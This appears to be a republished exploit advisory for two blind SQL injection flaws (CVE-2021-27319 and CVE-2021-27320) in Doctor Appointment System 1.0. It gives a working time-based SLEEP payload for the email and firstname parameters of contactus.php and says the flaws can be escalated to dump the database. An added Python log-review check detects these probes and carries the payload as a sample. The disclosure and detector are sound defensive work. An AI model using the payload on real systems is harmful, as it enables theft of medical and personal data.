Doctor Appointment System 1.0 Blind SQL Injection ≈ Packet Storm – Digitalmunition





Published on March 4th, 2021


# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in email parameter
# Date: 03-03-2021
# CVE: CVE-2021-27319
# Exploit Author: Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
----------------
http://host/doctorappointment/contactus.php

Vulnerable Issue:
-----------------
The email parameter has no input validation.

POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the email parameter, enter the following payload to exploit blind SQL
injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1
3] This can further be escalated to dump sensitive information from the
database.
------------------

# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in firstname parameter
# Date: 03-03-2021
# CVE: CVE-2021-27320
# Exploit Author: Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
----------------
http://host/doctorappointment/contactus.php

Vulnerable Issue:
-----------------
The firstname parameter has no input validation.

POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the firstname parameter, enter the following payload to exploit blind SQL
injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1
3] This can further be escalated to dump sensitive information from the
database.
------------------
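
Added example (not part of the advisory and not the application's code): a log-review check that decodes urlencoded POST bodies captured for contactus.php and flags the time-delay pattern described above in the email and firstname parameters. The sample bodies, the message field name, the BENCHMARK signature and the validation patterns are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl

# Parameters the advisory names as injectable on contactus.php.
WATCHED_PARAMS = ("email", "firstname")

# Time-delay calls used for blind probing on MySQL. BENCHMARK is an addition
# beyond the SLEEP call shown in the advisory.
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# A quote followed by a boolean operator, or an opening subquery.
BREAKOUT = re.compile(r"'\s*(and|or)\b|\(\s*select\b", re.IGNORECASE)
# Deliberately strict address shape (assumption, not the vendor's rule).
EMAIL_OK = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def inspect_form_body(body: str) -> list[tuple[str, str]]:
    """Return (parameter, reason) findings for one urlencoded POST body."""
    findings = []
    # parse_qsl turns "+" into a space and decodes %xx escapes, so the
    # patterns run on the same text the database layer would receive.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        if DELAY_CALL.search(value):
            findings.append((name, "time-delay function call"))
        if BREAKOUT.search(value):
            findings.append((name, "string breakout or subquery"))
        if name == "email" and not EMAIL_OK.fullmatch(value):
            findings.append((name, "not a well-formed address"))
    return findings


# Constructed sample bodies, as a WAF or audit log might record them.
SAMPLES = {
    "benign": "firstname=Anne-Marie&email=anne%40example.test&message=Hello",
    "probe_email": "firstname=Bob&email=%27+AND+(SELECT+7827+FROM+"
                   "(SELECT(SLEEP(10)))xEII)+AND+%271%27%3d%271&message=x",
    "quoted_name": "firstname=O%27Brien&email=ob%40example.test&message=x",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_form_body(body))
```

A legitimate apostrophe in a name (the quoted_name sample) is not flagged, because the breakout pattern requires a boolean operator or subquery after the quote.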
